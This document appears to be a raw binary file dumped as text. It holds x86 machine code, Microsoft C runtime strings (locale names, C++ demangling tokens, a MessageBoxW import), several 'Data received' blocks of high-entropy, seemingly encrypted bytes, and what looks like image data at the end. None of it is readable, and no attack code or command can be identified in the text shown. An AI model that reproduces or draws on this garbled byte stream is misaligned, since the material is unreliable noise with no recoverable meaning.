÷‹Eô€8u‹ðƒ}±4‹U”ÀþÈ$àpˆ‹‹Rèù1‹È‹Ú3Àáÿ#Ø+MøØx;Èr ÆF+ƒÆë ÆF-ƒÆ÷ÙØ÷ÛÆ0‹þ;Ø|Aºè;ÊrPRSQèË00‰UèˆF3À;÷u ;Ø|ƒùdrPjdSQè¨00‰UèˆF3À;÷u ;Ø|ƒù rPj SQè…00‰UèˆF‰]è3À€Á0‹øˆˆF€}àt‹M܃apý‹Ç_^[‹å]ÃU‹ìjÿuÿuÿuÿu ÿuèVƒÄ]ÃU‹ìƒìMðSWÿu 蜪ÿÿ‹]…Ûtƒ} w è”ÿÿjë‹U3ÿ‹Â…ҋǃÀ 9E wèü“ÿÿj"_‰8胓ÿÿé߀}t ‹M3À…ÒŸÀP3Àƒ9-”ÀÃPèâ‹UYY‹EV‹óƒ8-uÆ-s…Ò~ŠFˆF‹Eð‹€„‹Šˆ3À8E”ÀÂðƒÈÿ9E t‹Ã+ÆE h¬QAPV蔔ÿÿƒÄ …ÀuvN9}tÆE‹U‹B €80t-‹RJy÷ÚÆF-jd[;Ó|‹Â™÷ûFj [;Ó|‹Â™÷ûFVöP\E^t€90ujAPQè\pÿÿƒÄ €}üt‹Møƒapý‹Ç_[‹å]ÃWWWWW萒ÿÿÌU‹ìƒì,¡8¥A3ʼnEü‹EMäS‹]VW‹} j^VQMÔQÿpÿ0è&.ƒÄ…ÿu谒ÿÿ‰0è:’ÿÿ‹Æët‹u…öu 虒ÿÿj^ëäƒÉÿ;ñt3À‹Îƒ}Ô-”À+È3À…ÛŸÀ+ȍEÔPCPQ3Ƀ}Ô-”Á3À…ÛŸÀÏÁPèF,ƒÄ…ÀtÆëÿuEÔjPÿuSVWèõýÿÿƒÄ‹Mü_^3Í[蒆ÿÿ‹å]ÃU‹ìƒì‹EMìSVÿu‹@H‰Eüès¨ÿÿ‹u…ötƒ} wèñ‘ÿÿj[‰èx‘ÿÿé™3ÛW‹}8]t‹Mü;Ïu‹U3Àƒ:-”ÀÁfÇ00‹Eƒ8-uÆ-F‹@…ÀjVè¸YÆ0FYëð…ÿ~JjVè¢
Data received j-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-zað?5Âh!¢ÚÉ>@ÿÿÿÿÿÿï˜À˜@ð  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~txA€xAˆxA”xA xA¬xA¸xAÈxAÔxAÜxAäxAðxAüxA€QAyAyAyAyA yA$yA(yA,yA0yA4yA@yADyAHyALyAPyATyAXyA\yA`yAdyAhyAlyApyAtyAxyA|yA€yA„yAˆyAŒyAyA”yA˜yAœyA yA¤yA¨yA¬yA°yA´yA¸yA¼yAÈyAÔyAÜyAèyAzA zA zA@zA`zA€zA zAÀzAäzA{A${AD{Al{Aˆ{A˜{Aœ{A¤{A´{AØ{Aà{Aì{Aü{A|A8|A`|Aˆ|A°|AÜ|Aø|A}A@}Al}A˜}A€QA´}AÈ}Aä}Aø}A~A__based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*++---+&->*/%<<=>>=,()~^|&&||*=+=-=/=%=>>=<<=&=|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`EH`RTTI`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard' Type Descriptor' Base Class Descriptor at ( Base Class Array' Class Hierarchy Descriptor' Complete Object Locator'USER32.DLLMessageBoxWGetActiveWindowGetL
Data received &¥ûÎЏ}‰æl©ø£æB Â©#Èg÷—dû^û6\k)³'ãµ@èHdži®ù2÷8_$¥GÚö²p‹·ï·ŽJ  ÷µf†§‚ÖêÇOןÜáî.²8êáOäÝçÔùî2_(Lð©OAø9UÚê’˜±®~4ùÑR»a@ãîy!:õ…RzxÚćLªE‚®*Â7tòœš»Vš[öÚÅß8å¾ö¬ð0œî¶tÀ Í3:•õdA-ò&ùj)} œÊۖQ z¢¼qswr‘§å£ÅªÁ'Œ°R¼î9cK‰˜{_Aj “§ãHés–__ŸGû¡ f6ö‡M՛,[Ë7Žíéî°WÔê·¦úWz¯%ü»Cdž)y#Ó»LÿÕpyÈûç‹Ð©òrDâÿë:4™lf'üš¡h¥a\z}½¸Å"Ì,3ô'}ÿ2ý|wYYœ]‘ yÁ ýõ7ӊˆ“©ÕôõÛû‘gDP,ùvZYûÙQˆóf!«Ú‚cœ™ð¿‹Ý©B…i‹ ³i/ØÒ^`†’Zãy½wš8×tvÝÜÜýÌ^a³è£Ž”¸Ü…,% Ƃжoš1dj¾jӒ½øsœ©Õ{…@ƒÂ œˆñí6Dµøo×uéϛ,qlg +/ÛGÂG ZÂy8u_¾ë`–w.2gkî+Jȶty°5˧TzT¾¾‘¬(Ç®´žY"¦ðp™õ½ÖËËl@•Òtœœ߆èAq§oSø«>®ZúÍ¡Rël4¡œüÑûóLÉi3’è¿eAÛïÃ}•)A<Öãí @Ql¶‰s@ÙAe‰è‘#‰Ù¹âýO¹X0‰¯äš¡ðóF^!ýçe"ŒÙ¿f+|kÉý°±TæW¿árÿe¬a‚<ÃÇ îÞ¹Pöß“Ñ ÇÓB¯Ü=¢ù×ðO Ež!èí0-ŽÖe¾tïô¨µV/i?ý+Þs'¬‘ìm¤|{š£MæYµ—‰,Ù±¼è­~7Do?)R°lþ½Ø¡Û«v^ŠeÕm¿mË’ëDØîQŸSÞ9ôía G]Øj•üE)gCg4qnXÆ3ó‡u`¤HY8º9Þ|RӊÕí‡Øà¿G£fV­ëp„d:`ÖŒäo\V©{ˆrâ•vÉtªҕ½›%´M­Ï)°ð¥‚_«*«Ž‹ ²t­Ë_¹} ²¨—+¬‚“ñܾöÖÀ´XÖs¶¹ŠiQ¢Z"›Py YBr…(ZRìDQ½íða hweB•¡CšÕ· Uôò)õ³ìŽðxêÖZ¬•hÀ-ùK)óW¶tú>²"F’ÊD §ê¨šÝŠÖM?¨Evy­…k×N>‡/*E>ß;¾|Ä4†4N[I) í‹srƒºÌMí¼ «1Á._¶Õ*)c½øO¦Ê͇×A„¬ÿ<HÞ%†Ìc9wowÕ5¤ï3C„“è',êô?ŸÈÓ*‰‚Y¡?ehÌ{þAÎCzxÁØÿÛÍïû‡¬ç¼xñàWì O"ƒ}jn¨/sÚh ‡PÛ~ˆŒ,J—VÀ Rý`èT{†¬\Ñì0KâZÌ ÛÊӛuӁv G&öupÝoCyجªá¦2òh÷Y H§Þ•Ò[蔛… ¾“ÅlõðÒá¤9ž°-Cñ7;%ǏÐjsÝR¶¿kB4)$5 ߨ‘q íʳ‘g7z§-1ƒ±Í·”ÿ-ÍÐÑ¿”ÄwA~Ì*žyíVeMžo¼Gë[àÂ~¥i¼ƒÇ9uÑ÷C†Ç1ü³—iëўãvʉZ¥úÝ్ÇHj‹éájŒ”†‡¬|Ô½¬h!Z–€v½»¾„€ß?SџCŸ©ßÔS*âñ Ìm˜`lEÚ)G†¡µþvnCÖQ g2œ>üâEh.Ä ;òٍªÙ¤ð‹dT/Û¶Bâýï'fÒNH‘¦âDõjÞhHPL)Ñz1¨ąªêpMJ\f ö˜ôÉôëaγ,ˆ;`{Ú7"ªßsŸÛ¥n@ˆQ[ÜÚÈ+÷”(zä œ Ÿnûڅõ±8ñ¥ûxe:Eæ…é-Y@¹S µ.ü⌇â1V``àú6õä|ý=NRI6}Á/¥@ÿÍñŸÙ¸Et³HqA¶èøß¾¬²Ñcù0Ðt_–Ššß¢Ñތ…þ±¢˜`Õyü‡UÄŸb!=9°Ò :²r oâhûþe ¾K$.jcR‚ƒÝ>Ð<ˆ>GgÕ±8WënP¨ä2N¤zÒP,ÝVªº€ByNÊx{º4k€o«(‡†.À8œÉëä±E¢˜ž±º&ÀÝ®õßwBãÐ!UœªÈÚ¬Ò,Sˆ}€I[w@G_‚ð—õðŒ2VE/Z\“×bI´<M ´-G‰ÚZ™ž=%xÂAð¹n’ß|¢±ùý«ž© C?%¼4—ývåÞY'j5YŽe¬îQpd;±ö™Ü°º?ßWÙîL—Gv"N¼åäg[NȧüM>\¢$X&²~réƒL½ÏªJ¤½å/ÎCå† ™=“,ls¸Ówõ哽á*±hÍÄæ]Ç̖³ò?ƒ*YVãÀ$(´ÕI݋VÄÛ³ð­ÂãëU ƒä>u[öŸyyEDz(SÔFŽ•#€«â ÚTì û)ÝÀÌÊ"¦éW³6XÇT7ýAcG¶d»æJhy´ÕÐÔ§hËB…ëé ԊHì«®YÉúû»—µ„'ìÕÉ4]Z¥a®Ñìm›á»Ðž#r²qQÈ/„¦þ®Õ!J²äƒ ^M+_pòÃvo¦ƌ 8âþ‹_ØÖÆЂ׃ ›wÚЋ\¢DäC¨ ² K$©ð×–SSņns&¼7’-àyáR°–Bpäô;¨œ‹ç½ ¹ ?ìàÓ5…˜Ê8WÊýÍfNk}K$ þ75Õ¾Ê2Ȉ÷ñ­ø! zó‹u»üµê_J0p,ód]Ô>ÕHÏ$$us·£6Ð\Ý̵oð·UkÂ(ŠâgŽó’ªë¢¹“Á$G#Q~¸VâF¿e ÄJTð®^j0Î, è&}l¡Ã«F‡«çj(éMH©œã¶-«R„;¢aC&A/ۛ/%Jÿù^SQ-M‰÷‡3ßÆs]ü½k„·]Ć æ]ù=ûتƒ‘çÚØÏfT$Y¯ô†K'åTåMàY˜Řû.Qåw×´ Ó¨Š“Ô7ç»é2QnÈ;d^0Ño0þ1·ÁÁ$±¹÷ö»¬ÇݼÚïZp5IÃP~“ñB•åo‹óÚ?!Æ4–Dº8Œ>o͞¸ycÉÏAd¯–òûSlÂ<t—ýÁ$©»Lå?
Data received %ÚuÝÅ Ê)'íaëk&°B¸fÙ[…2~ø-ˆî_Šü3=aÉ´¹>Øúփj]ò4DKBq4º@œþ/ž?³š5Ϩä«;ñ_rÞìVûÉ=s}¥ÞÅáCÛ8óáÝp$ fʔ‡æÕ÷2>F_¤çÅ6)€ø ™‘æ¶W‚}Í¢[€b”hƧGø‰r! …1o1!ç&° ™¯ð‡bÓÚõ¤“ÿð-Ð@²«sڀdx‘"¾ ÈÐ ¯*²« VÔ[úUf€Uj˜›  q r7.jsÃ×o0ÃÎjt¯ ü²—+›ŽÚÎ]†i”:ƒº»JH‰ßY ¬' Píz;B·Ž…‘¢ÐXàRÔáV–‰Íü‚ á²PÇK.2>›xÏޣ랫ýxRð‹/žߗú7F&ÕR E‰!³%Þ(yݝ‰4’g>ˆþNYËf>„ïÌC«-\$<Îkԑ÷EÀ°±XK] eÅÄ·2àÊ’Í«E3Ð-BF‡M呯¿8tÚôl,Yaò~hCR1ª«ü¿K %lPt!(:64ã ^æÀ°¨4áÎtdXä4j0zoÌHhÉ¥zµ‚ÿÂP¥}`šÖ„ÈÒükü#I$èñ‡…up3dpeÿªäêG›”DÛ0¦ÕÿÁb¹Êü¯9(šÂܚ2ã·ªF¦|éÍڏaüS>%Éäqcc3³×Óý“ösØ›`×)ٗå>k|å՛y^ʔ¾ ýÕLlI¸ÂÜ,'TS—l¼ð $»>aÝç§WòʉÖ⠑`;V^Ÿðg9Ç×öT´å+÷m­H­™A®Ÿq!N†s/„H/ˆ‹žàV~tðnz¨9õÚ¾w û®Œn}áÛȧŽ©ô?¬ØÒ3r=ûÂÝ2ªn ¸1•gÏ9£Îä½dí`ïB؂Bh¡›äJ‡äcÔ(iàÖt…0œ¯¨;4%=!Ò !&€Å Åråû°j§úÑò›{h©U„£)ՍÕÑÙ͘¸àÆOw„ÆOÓ¦³ŽáÂÅ5/z櫺åYZÞàמ¼ÖPu³ iÉ­Ñûg«f¬Þ¤4;RU Ÿ ‹5ŠÝ¦JêzN‘2òàՕãnºçŸC7hÿjP뢝Kó[£"ûŸS¦w ¹ \îT ~áÀòΐ±Ž2 R+îëiµRü!ÅS»Ùæ–<Aï*ÞÖ~9ƒ<É°tßëÒMüŠJÑî?`µ'i–œFn.vSoª[—G¨×ƒ`w¥×]y<Éû±_®|áÍ~z;¸Ž0y®&N®ˆû=Ûçåµø U ¼Ìðª3¢kÊ)Vþb%ä®lÅþV£–Zi$Ù%Šê )©²lÙÿÆ` –°ð>äz¶‚×Áán,øåKÐe.÷ýBp R³’¤ø蜵ñ§-º,™cÕ|É,„2²´Emè®{Ò§µÆ›Ô„lÇ6ÀóŠÞ䘉?ÅÜu¢uùøUtMk–j¶Yùµ:œ»Ê`–‡³…Z¬òöÈ»îWõ͝5mT›,z«_¬n5lqlˆ™í¶ $¤·û%ù+x_ÙÓmpÍ$"ëà }•Ó¡ˆX}¨uêi“w_‡‚Ïxý(’!…ÄM¿ÏµyÒáJ¦¤eq¥ZõsT<Љ¿Ú=íb³Yä‹×jï"žS^#èð‚ñ̄ÑԒM¹¢ wAPÞB0ÌÔȐ ¿`×w³”}=]h^Î@³.Ÿø˜2HŒr:Î:þð}õ:í$þ^Œ­Yé-iÃA°Ïa/f‚ã‰uŒ`ÉæOi€žÝ 4›Ã±„Áם’(y°Ñú)²toñ{š— j©*¨Puc„†)‰ ûъ€´?û=æåî``¯å']ÏIº×ð勎û’!øfQ"FF¦C ¤E.pÜü•MfÑù‚昕ÜRñ*Øgù©'Pⱚ¬ Ô¬1enxn݃â­Ÿ¿ÿåéŽ`þùÖAΠ"/ž¬  ÿBHñ×và |DfVvE.$qéwääuÆCïQñ…tD¯ý†˜É}B{/C'Æ?£ô”+ñº…øö­0j?¾Ø1zês:bòæ°`Ûã‰ÛÖ°~Bhs€qâ7xÆõÕ?>Ù·.5?³ Ê!ˆÙ³öz¼ö¿s…™,;ªæȌ Ë |Z{t’€`X§v‡YØw'ç‡,iß±1 ‰î´CN™NÂÏØëCӀ¢ëBdb” ŒI^/OM[ˆöIO*Q´¤æ&À¾OÍNyw#Ðô¥ ç\©ÏÞ¸8‡$óE†$Xƒ´ãtÿ_”îÚa2éÒO“ŒétE‘»dBŸV<“ cxDkm¼hZÈãN5gâã£Ub l½-¡Ûë(uôÅÌKbcÂÓ\ºÑXa¿˜>Ïö±p³Ö~Øé²!8ãJ1cwN͒(¡xW±Ã÷ûٔ³àU¢PÕ ãeèF>+¸”öóœÄ÷@†?z/—šzæä.«Œj] d[2 ¸]¢Íˆ=Ò©>ۀ­A¤“_äË$MªþÀ;;œõ1¦ ŽˆCãùmW¤©‘yn¨„è{eFÛ¨Pipa·Oi܍= ˆ_ꪫXŠ6Š¸b—ºˆRã°ýšäsú“q”Ÿ¤‹žõ"’ú¬9¦ )U|1ödæ󇹵ý ‡í(ëàëÔÁÉitŸyböÒµ’å©u‹¼p6 Œ dZ§±·ó‘´j/™C£ð™\]-Ñ(¥Ò¿0ߙ­¸½‹ZÝ &:§„­HpŸK Þ | gg"N^ƒ½<>Ù(F4™lÉ\ˆÞCÊòvÑ ßDf†·GÝÙ #O×{¾5¹Œ ôo~`ô}cZoá$Šª7?\ ÕwÀ+—¼c;fšU40ù¥®‡!y0e¨Áˆþ`ß÷©§Dš¿(\}ê/#þ‚Ö›˜ÙwRúêl†ß*;⑁·‘ñÚ\éߏ›™Û²Û ‡d9ąeÐ:àj¦j®Œî+agÐØÌÆ¿)^ ·ñÂ,–͆øpÎꋳeÈmœ°üù;n÷ŽkpU†ÙwÐ'œ)ºûJŽˆ4ÐBá~!—!=½Þ YÍj6…‡b“I„£³æ9ФH’ì嘾ŽÛ«Dbëšfó=‚ ¿ßFÈÞƒ¶AæOÞ«ÙtÃظt`lφ,Ãäq»!5?Íú^g-tä½èqìù=DZ ÙZђÏjϸäñ  ƒí©Ž@Ø=²,…ÁþÁ¦]õ\¸vŸoÖmÍmfƒ^ˆ>€¸ÈApi²O$ôq5UÎgƒþÔª—0ä
Data received _[ʞ§êãÃè-C"xMxҠЌ3uÜa;ÃBa—7:ážà»üñ¨+&~÷ˆô/ÊÛ²M*3UrPóVƒú°ï¥™>ä™:‡§ÃËFÈYÍÙîY\‚‚RmÎJ/’­½å“Êê®R³È˜FÝ´pæø¹ å|.ŒRKØMœe$ýø%ïF^V’í¸™„T?%ˆip7¿âÁøwÆ"b qÌ1y%%sÚ6´š\&ºsÊÂ-ÌÜ'C $¨ý Ã`{Q•²„M?¸Ä(ÁZÝUáÍeãÉj<£€,~‘SýȞü'´šá’‡Í¼˜²§Õÿ ö2õï-Ûb;6XtO¥÷³‘]Ä ^oÀúÇ×w;Þ5Ы—šrï…1•èž¹æ‘Æ#,¡ML^')zžÀúKý¼Œ1/ Ø×äwçp}ª$ª¢WÚþ{UŠzd—¦Ê¬ ) )¥ò^èÉ/ hïÁË:›¾[`ÂÓ¤•06]žÞ1*·Z:e™ŽËOY³ •ÏÝ}#ˆ%þ yr”#àÒTH­ºæØïõT°Åü‹ )Úᡱõ3K^#¢¿½Ç4?}Húž•¿Ÿ ]å5ÀJYã1»³Eç†æŒæ-8J™³È2iEXR–?"Ô£añ‹%À?õèë œ|ˆz©û+ÚgjgB\,+P¡Öê³ô$øý"<õž®¯Qíšë cW¸FDIVzB¼ë1›Þ0G"ÓÃ4 õy•’,ô8µ˜E0¼×ÒZ×_ˤ€2ºÄ´U@1ÖK¼[àB?ì7ÍßøOŸ‰˜roaÖö3•F¦Ù€]Ÿ|TIšà”ù-œ¤Øb˜.¥v0€êÕ6ÉÌZ­µ_¼ú6ãÊÑÈphØÛݖýA¢ŽMþ÷m/UŠ¹W¢râG; áÃKꃙeˆà û­rœÅŠaõ‘õ'NÕ OçÊ |à+ GNċ[T£]lÏ ÁÿµZޅV-h!f“ÐF>>â+}«ÜymM>óec¸Kgx6‰šO®ãt‡3n՘šÂå'ñgÓn¤Sˆ]„ƒ1\‘]8ma‹û¬Y‡îìòZš«fgØÍ+&Qv‡5œòÊöç{¿b•n-F±æA­uè4Oè‘ó£àl°å—¾8€™´ ºÑ´ ö¥2Tá(§êHü[ ÜÝw21C4i”žð#–DPõ\ÆÀ{©¯ÇÞ§·r-çùÞae#oïޞ±•ñæÆ +ÄtBzmK ¦‹B-´þði†oI\†jñ÷5P<íyE  O†Xwõ­ôš–Pf¥Ú¢êšñ`_Èç¿Ó–åÀ5Z±;lµµg’ædù‰ÈVDªºUµÌß[çL|•’~“Zï1GŸÖ@$<±&Æÿq–ı»µ&¯ )­üÃÀlFž’Ž‹Ü#™_Û ÖÆ`bû•úת'jÁ# *#°`ubÆvà3j}·y>Š×!…icú>§58,ii2rë µuôŸÉD·7ä 9¯?TRc&S ¸-uRZ;GÎO ¾Nš®®ÐBµMMåêô¯ç·37 2‰œå‘‡VA`âQ×7ïu)°ÆU©á+ž˜l%ur^$L"Fý¡+?'Žh=*0~„*CâNì’âø™Â$½vÄqþyµ½ùØFRc‚»ì´ë±e÷F5.!‡À—#= UfÚJ!­cÏlœKЙ žF•²LÖ'þçKDÜ4&òxBðûO%BT*ûÝêyªÁ)ޙ¼oʳ–[®9µ­p•”5ËÏ~†¢© ¹þð­œçy®:˜í#ûdz佼oÓP·T[ÎG ÏH5§!Í3>L©¾3Cx"™©§gø¨ˆ¢ë¨ä|Ÿ†éè¼Ôç¨RäÏé>r@¹Ëuæ$Ðg-t¿ÍÃüê åNx ÓùIßg1¨C~ ‘ËÊK PóZ±êm q¨Ð‹þõ¸H»ØRº7?³Tj|í` L>®Á&|d€Û;ßÕÜp‰ &·¾*(#.E?Âr Äü/–9üwªssÚ8åõ ]ú-ª˜¨ÿ‡v¿Ä0 ;‚â‚»M¯¾¨¤º*•Ùpåæ¸À¸4‡âZ/<Ì*…¨÷áFG–g¤C¡ ºèH¸WÂåj£~%·.‘ ~ ðË°c—¸îÝÝlP»B CsóHŒíô5Ê »S¡ïýã¦gàÃÝWjmû9çBÞôÚM³Ð£âIŒèŽ¶©J?|üréGÇÑKjÈßü|ð¤òËŖ+‚âQ=~dý3“í»GåcœHd '”¿,ÊHæn%àõr¨³®ª·•¿' !º*€Æû™wã駽}ämäݲ֖à{Gø1ý#,æ¡l^¢:Åɯ`É" :Qҏvì yaŒ§Á½|”ÖÁü•'Nˆý´µôU˜bå …ÌL3‚ÆÁÀyÅG%©3»áƇvÊà3^ 'ÔcäC’Èº˜k’l¯ƒP*aæB5áAø€¨°ºWÞ#HÄð~1@×·ì”ڌԈ@‡“Ø”­ØðQSªÍ¾ã’`»Anô‹‹L‹q“*åïÐX7¥}Š‰Ú.¡ëZqo ]xO‹6êàÐão\~B’îoé—9W>1=.âÎ Q·€“N/͎´ dæòD‚ˆpS=Ÿ­t;®yè{g¿xMx‰ óž>æLnÎ÷huk.€pUŹN嚢[۔c¨¿?‰ž«y½6€’ê&1$¦ «ã¨²Î¾w‹“XÆÐj‡c7±iŽ¶/jn6êyV´J:^-*g›a##Mhÿ}Û õ¼CÚyù<ÑÍy¤YÁ‘ªjíganº^'pq”ý¤7m 'ƐmÁôÓdõh.S±:D¢ÚÌ%¦=.i–•*¬¢"Úçèú¦‡ß]c›c~»è²’ɝ)VŒ!œNŠšƒ¬ ûð¥Mti„ÏGÕïZÛg§¼}çw£MøOx|oÂé Bxо3¹Î—mt:Ÿ¿Çã©<Aܻ摰c¹¸¾Ò©Kà>õf*ˆý2"v] WË?¤±Œ_/¯]f(üs¿cî$¬òU"9ik–3Iƒr¾‰LV ÷·ÏTîUða¸'„(ʤ[¯ß>îÝ­šözoxU¢”ÃäÏjÆòÁ¾ÜM¯îñ @þ„}*²S$‹‹À4ygÄ"ŒÊ½‘¥Úfl`eþ;PÑkÖÊ*oh» ê™SÂ2 ÃH®“@T!;ø>D‘I{4ϒîE ý{¾0k,=O^ÿ]+g”Ãa:Q/µª<ÌrÄċ9ÿ CNe Ì/Æ^÷”‘dƒ¢ù l!;fQq€¶ vôø ¹º-hSâ–%|I3Gšn
Data received e·ôZÏ2¤0OÅ—6žzÌhXD󦇀Îû§¤ª n±êuR§MڍH+ŠdWÐo7.{¥òþϸ¬üžÔ,ñÓG2åB~dâïLQã?’$3ë­Êð¿b匒ÙYªÙªã¨ÌI·Ú»ÎÔ«8™òï¼%V­Û:„±`²S¿ûÈ*’9'ÉVVã…QÑÑñt Hu8‡Ñ–š¶Ö(ü²è:˜Ð¢Åb^;hÖ3 ©ùPå'²èéç (Ù¼ÆÆ9;ÿÆäÄ8­µLaꇕŸ¦']¦Ðæì­,»J* _gV¬ZŠäŸ”Žv;Eìæd3_?÷¼ÃÏìGB…æ³².Tœú'¦ŸÜQýÈ0¢åכËÓNŠïÁy †Ø!-å[4¹0¹"×b#y\ àËYvŒª¦)SVêTßâ3]:£äú1U$q½ºòX ÌÔ 8»ûsRú ßÊbxymÁ<qásu|ú®¬Ì*1RÜm~[™‰Iàª)-uÖõ@ôYÊºEýÌÀ“$ß,…ÅøËû<0µ¼-)p1¶Õ<¼0šSÑõ†P‚ùØë¼!°%dÑs[„ÖקÐ43ãt¨‘S ý WŸ ^äU¸•ºÒ¦)&4M®ÉGõäQÛnK¦üF׌æ¶y³û?ÚÐߞ Pï`0§­î[vU&Ö ës —,Ö ìDߖl&¾ôhËH£<¶Ògµ±çœÕ]tÒFºé¶ 핪yDmÅBœ[FZymÇ/µØþ…~uŸÈZæ”dÿõC,ùÕb Š±,Fœ%ώw\ö¹[×'¤c PÀÄYÝy­¦å#K×ÉÓæœgËm/úÀð69Àƒ' 0Ž²Ì=¦“`±tð…ñxæÄÿæ,qÏtáhÐÕ6tp.\™>%KÄ?Ù"­Ï’¶¦[0!ÂPåZiƒ©A&I¶ Ä>+¹DüN³JUBŒ ޗB/û8üºbf$¤p$3ãV••þmžL¤geg~iþáúx%ÑqÔÌ÷Im‘pZƒ¬n<ûº‹×´¸Â»Ê'áeu%‚æ ¸ËS3½×3(îìfÓqfPd³Û¾_\'`Éô V¬á¥’”üï`êÑ)éÊOûÀÝS¿–4ù,íFyKFC¤@¢8¨Ôƒ€qûB’2’L8„ô\«U³ÊAÆؐ ì`7+ B€Ë[^T@ÿ†rv?7ù‹åâŒÔQG gøê'`ý4«8ÅWXØ#ÒT@o«eÓ´íD‹ Jãï@µkïÁ痩Çÿ_㿶ög&Ôr?•ÐŒ¼T zªÆÊ5bwC <ò<.EÉD¦¹2³Û{ïÆN>>Èѕ$(§ À¡äf76;9¤éŠn>ÃÏܺ¸˜‚î⹑@DŸj‚,sٍôÌWs09RÆWwTuÅÛBö¿“ó‹^d¬ž:¶Ÿ#­LˆìHUMböî9UAŒµF,†þPmw¡h¼Øå=v@´[ÄÙÛ/ôš¤KƖš8_¦MЌ8!tü;\½¬¿¢D¨lüTL>YmyPMõ ñî$C·O]ç©„ÌÇ·®¯÷pýG{õԎ£stq=€¼L³Ö}—J Ñ}×gõW@¡,‘UŸŸƒ1®¤½–Ð!Šœ¦…6!ËëFW”ê¨rÿ„íW#>¼
Data received I¢èqœl§ç…Èê|.ܦ¡n7ÁSuy÷*ÎÓÛôd={t\´£ÅÄVOV&öÉÑ#p•´«•¨rY#'oĄ†ÑP)5ÌXi‘ÿ{•RßÑñàJ4gŌ3 ћ±Obiê³&ÛRÛyV­G´CQ¯%¤?åýûÓ(Ê䘓a6¨W¼#¡)†+ä×Z¹˜tϑ,ê¢óœ`7YbT›ugÄâÝfmÎ$rF.Þúœ*U¸ô%迚֨9 Øá¸]äSÂ0ò:'ΎC nT’FºªÂ,:( Yhh'Í{Ú..æ;n®Q­µ“0óç]ŠùœÂ/ŠÉí–ð ;IÔîfUWR_‘+ äËJxp:¡B@È»Yréá…ûҜR’w㲐ùޚH¥”6t}ÄmªëhmšÍ¿Õ³[Ž<°\ñòŸÆS"S<,»Ä_ÖXwÞëk=¶U}®E豀æë…#´˜e«ib°‚9­Unÿ&§îØôw½ËZ46vʸ Ø‹ùIk1ø11ÝÈ]Cý´Bô^cµ¯èë+WSœ¹XÙ§çažiœàEÿïmnƒzJGÄŸ÷i’®“â⤆¾ÁHӇ âÌܞß×ëÝU[Z†tqÀ¢£-û ív­×ÃÆà—°¿, õÁ,ü§¡69‰`$-­™†v÷Ûγ"®›¿^۔EówQò†·Žx Õ½g¯pšB‘R$)±ÕI™rÿ¨¨ŸóÐ?x&)ˆÎ6øмõ+뀫­:8U˜X7ŸË5Q¡(+ì±%¢‹P“ÜQÇãΊ¹¬A&ÊÞ¼>pÒ,|&ÈV»`’܈WO¾ÿI%©H zitº㴚K™qJœ]”õg¥·ì{y0/ÌÂCäØ|ÿïBTGþý*m½–ô&ÌPoš•t-€wË ¨”Ø‹MšrL-Žˆ¡õÁl‘¼ÜŽ€¼uxã°.ÐÔµ¿¼R†ÜÕÞ¸±räûXx!˜û /öŒ>'.p#n€F’ ÿ¦(HsáÉõºuð±?0ÏGÄÉ"P ÅIj¬B²Þ;/5¯¶…Y¢K¢Íú„NŠmL¢øøhF’(/ ñ• @oI5‡ ãôU7 HšuD)‚—ñ’„Gìÿú"&x˜“S®½©|ÔÛ ÃsÕ=?ۂý“{¿g,>ÝêN–ójû1·`{ç‰JdGhSžpŽE“ºßO9Óy¬Ëk^[f莲›FÁûúîb/QEŒ§[5’F¬®¥\[{ñõáeúÔEÁĞJÿ•Œó(fúÏ\:çþ™‰[íçWï_¿p‘³­z¨q±9ÒEÉ+— „à™hŠž‚p=´Ý–êDë!£Ê€Ý`ëÅóu¬0µ¯M,]P4J]áÔ¹¦Öá;—a՝K¥J~Kì6áë?¡|lì|06ý¦{‡L'úä’ÌH&õT¶€Y#Ë2ùd0vžd`¹ö’S‹-ë±00pÑ<h®ßô"¦Zp]æ¯Ë0¤aÉÂtå K®<.¤Ç²Q›ƒ²¡”'½si[­äV(«Ø3ªþ°uÀçíɱ-Ցg´;²ŠÏ{ûKÄ^?=¯™U/Í·$j®F|´§ Äz:Íötºj‹nnØܕTSkšn*ˆ…“Ù äyx‘æ°Ã ‘<
Data received opl^nlh¾kmgôkomòojtñnnmòinkïlmlðhhqöggiòggoöggk÷pmnömglùijpîokd÷njf÷fmcõeojíjiqñnkiîljpöjgjôihqñkkpòejkºhqoZlmikfh÷}{zõž¡¢÷¨¨¦õ¯©§ú¦¨«ö­««÷¦±¤ûŸ©­ô©®ªô®¤¬ó¨ª¬õ«¬«ô¬ª§õ¨«¨ö¤°²ò¥©£î¨¯ªø°ª§ò¥§­õ©©¬ô­¥­÷­§¦ù¨©¦ò ¤¡ø€ôsmpòiqj‘jmhilolò“•ôîìóôô÷ùñòöóõùõõóûñõñôõð÷ññðòøõóòòõòùîûõôòóõòöðóõñóõó÷ñ÷õõöòóñòööôöõõöööùõðõòô÷õöô÷òùòôõóööóóõóñõôóæ󒕕ölmkóipmblimÇ~}ùöõ÷ôö÷óôùññõóíóòº¹»÷¬±³ô²²®ò­°ªø¬¯®ð³¯ªò±¬µöµ¥°ò®¨´í³µ²ø°¬´õ«¯ªò¶°°ñ±·®û·¶³ò©®©ò¯­¶óµ¸²ô¸²Àññíðõòñõùöøõîóú÷ñ|~{óslsÇigiñ £ ñüóñ÷öúòóÖØ×ò“‹–ó~€ô š ö¢ 